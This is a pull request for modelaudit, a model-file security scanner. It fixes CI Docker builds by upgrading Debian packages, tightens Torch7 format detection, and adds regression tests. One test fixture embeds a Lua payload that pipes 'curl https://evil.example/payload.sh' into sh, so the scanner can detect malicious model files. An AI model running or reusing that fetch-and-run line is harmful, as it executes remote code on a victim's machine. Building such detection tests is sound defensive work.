### PR TITLE
fix: repair nightly and docker ci

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -12,6 +12,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 - avoid repeatedly scanning sharded model families during directory scans
 - keep shard sibling discovery within the requested scan root
 - preserve per-shard metadata when aggregating sharded model families
+- reject plain PyTorch source text from Torch7 content routing
 
 ## [0.2.45](https://github.com/promptfoo/modelaudit/compare/v0.2.44...v0.2.45) (2026-05-03)
 

--- a/Dockerfile
+++ b/Dockerfile
@@ -12,7 +12,7 @@ COPY packages/modelaudit-picklescan ./packages/modelaudit-picklescan
 COPY modelaudit ./modelaudit
 
 RUN apt-get update \
-    && apt-get install --yes --no-install-recommends --only-upgrade libc-bin libc6 \
+    && apt-get install --yes --no-install-recommends --only-upgrade libc-bin libc6 libcap2 libsystemd0 libudev1 \
     && apt-get install --yes --no-install-recommends build-essential ca-certificates curl \
     && curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs \
         | sh -s -- -y --profile minimal --default-toolchain "${PICKLESCAN_RUST_TOOLCHAIN}" \
@@ -25,7 +25,7 @@ FROM ${PYTHON_IMAGE} AS runtime
 WORKDIR /app
 
 RUN apt-get update \
-    && apt-get install --yes --no-install-recommends --only-upgrade libc-bin libc6 \
+    && apt-get install --yes --no-install-recommends --only-upgrade libc-bin libc6 libcap2 libsystemd0 libudev1 \
     && apt-get install --yes --no-install-recommends ca-certificates \
     && rm -rf /var/lib/apt/lists/*
 

--- a/Dockerfile.full
+++ b/Dockerfile.full
@@ -10,7 +10,7 @@ WORKDIR /build
 COPY . .
 
 RUN apt-get update \
-    && apt-get install --yes --no-install-recommends --only-upgrade libc-bin libc6 \
+    && apt-get install --yes --no-install-recommends --only-upgrade libc-bin libc6 libcap2 libsystemd0 libudev1 \
     && apt-get install --yes --no-install-recommends build-essential ca-certificates curl \
     && curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs \
         | sh -s -- -y --profile minimal --default-toolchain "${PICKLESCAN_RUST_TOOLCHAIN}" \
@@ -23,7 +23,7 @@ FROM ${PYTHON_IMAGE} AS runtime
 WORKDIR /app
 
 RUN apt-get update \
-    && apt-get install --yes --no-install-recommends --only-upgrade libc-bin libc6 \
+    && apt-get install --yes --no-install-recommends --only-upgrade libc-bin libc6 libcap2 libsystemd0 libudev1 \
     && apt-get install --yes --no-install-recommends ca-certificates \
     && rm -rf /var/lib/apt/lists/*
 

--- a/modelaudit/scanners/torch7_scanner.py
+++ b/modelaudit/scanners/torch7_scanner.py
@@ -57,6 +57,10 @@ def is_torch7_signature(prefix: bytes) -> bool:
     lowered = prefix.lower()
     if prefix.startswith(b"T7\x00\x00"):
         return True
+    # Marker-only matches must still look serialized. PyTorch source commonly
+    # mentions both ``torch`` and ``nn.`` and must not route as Torch7.
+    if b"\x00" not in prefix:
+        return False
     has_torch_marker = b"torch" in lowered or b"luat" in lowered
     has_structure_marker = b"nn." in lowered or b"tensor" in lowered or b"thnn" in lowered
     return has_torch_marker and has_structure_marker

--- a/modelaudit/utils/file/detection.py
+++ b/modelaudit/utils/file/detection.py
@@ -1101,6 +1101,10 @@ def _is_torch7_signature(prefix: bytes) -> bool:
     lowered = prefix.lower()
     if prefix.startswith(b"T7\x00\x00"):
         return True
+    # Marker-only matches must still look serialized. PyTorch source commonly
+    # mentions both ``torch`` and ``nn.`` and must not route as Torch7.
+    if b"\x00" not in prefix:
+        return False
     has_torch_marker = b"torch" in lowered or b"luat" in lowered
     has_structure_marker = b"nn." in lowered or b"tensor" in lowered or b"thnn" in lowered
     return has_torch_marker and has_structure_marker

--- a/tests/scanners/test_torch7_scanner.py
+++ b/tests/scanners/test_torch7_scanner.py
@@ -28,6 +28,16 @@ def test_can_handle_rejects_non_torch7_content(tmp_path: Path) -> None:
     assert not Torch7Scanner.can_handle(str(path))
 
 
+def test_can_handle_rejects_pytorch_source_markers(tmp_path: Path) -> None:
+    path = _write_torch7_file(
+        tmp_path,
+        b"import torch\nimport torch.nn as nn\n\nclass Model(nn.Module):\n    pass\n",
+        filename="source.t7",
+    )
+
+    assert not Torch7Scanner.can_handle(str(path))
+
+
 def test_scan_detects_lua_execution_with_network_context(tmp_path: Path) -> None:
     payload = (
         b"T7\x00\x00torch.FloatTensor nn.Sequential\ncmd = os.execute('curl https://evil.example/payload.sh | sh')\n"

--- a/tests/utils/file/test_filetype.py
+++ b/tests/utils/file/test_filetype.py
@@ -378,6 +378,20 @@ def test_detect_torch7_formats_by_signature(tmp_path: Path) -> None:
     assert validate_file_type(str(torch7_path)) is True
 
 
+def test_torch7_magic_rejects_pytorch_source_markers(tmp_path: Path) -> None:
+    source_path = tmp_path / "model.py"
+    source_path.write_text("import torch\nimport torch.nn as nn\n\nclass Model(nn.Module):\n    pass\n")
+
+    assert detect_file_format_from_magic(str(source_path)) == "unknown"
+
+
+def test_torch7_magic_keeps_binary_marker_only_routing(tmp_path: Path) -> None:
+    torch7_path = tmp_path / "renamed.bin"
+    torch7_path.write_bytes(b"\x01\x00torch.FloatTensor nn.Sequential\n")
+
+    assert detect_file_format_from_magic(str(torch7_path)) == "torch7"
+
+
 def test_detect_executorch_binary_requires_valid_flatbuffer_structure(tmp_path: Path) -> None:
     executorch_path = tmp_path / "program.pte"
     executorch_path.write_bytes(b"\x0c\x00\x00\x00ET13\x04\x00\x04\x00\x04\x00\x00\x00")


### PR DESCRIPTION
## Summary
- reject plain PyTorch source text from marker-only Torch7 routing
- upgrade Debian runtime packages currently flagged by Docker Trivy jobs
- add Torch7 routing regressions and changelog coverage

## Validation
- env -u VIRTUAL_ENV UV_CACHE_DIR=/tmp/modelaudit-uv-cache uv run --frozen ruff format modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/
- env -u VIRTUAL_ENV UV_CACHE_DIR=/tmp/modelaudit-uv-cache uv run --frozen ruff check --fix modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/
- env -u VIRTUAL_ENV UV_CACHE_DIR=/tmp/modelaudit-uv-cache uv run --frozen ruff check modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/
- env -u VIRTUAL_ENV UV_CACHE_DIR=/tmp/modelaudit-uv-cache uv run --frozen ruff format --check modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/
- env -u VIRTUAL_ENV UV_CACHE_DIR=/tmp/modelaudit-uv-cache uv run --frozen mypy modelaudit/ packages/modelaudit-picklescan/src packages/modelaudit-picklescan/tests tests/
- env -u VIRTUAL_ENV UV_CACHE_DIR=/tmp/modelaudit-uv-cache PROMPTFOO_DISABLE_TELEMETRY=1 uv run --frozen pytest tests/test_cli_license_integration.py::TestCLILicenseIntegration::test_cli_mit_model_clean_scan tests/test_cli_license_integration.py::TestCLILicenseIntegration::test_cli_sbom_generation tests/test_cli_license_integration.py::TestCLILicenseIntegration::test_cli_comprehensive_real_world_scenario tests/utils/file/test_filetype.py tests/scanners/test_torch7_scanner.py tests/test_docker_workflow.py -q
- env -u VIRTUAL_ENV UV_CACHE_DIR=/tmp/modelaudit-uv-cache PROMPTFOO_DISABLE_TELEMETRY=1 uv run --frozen pytest -n auto -m "not slow and not integration" --maxfail=1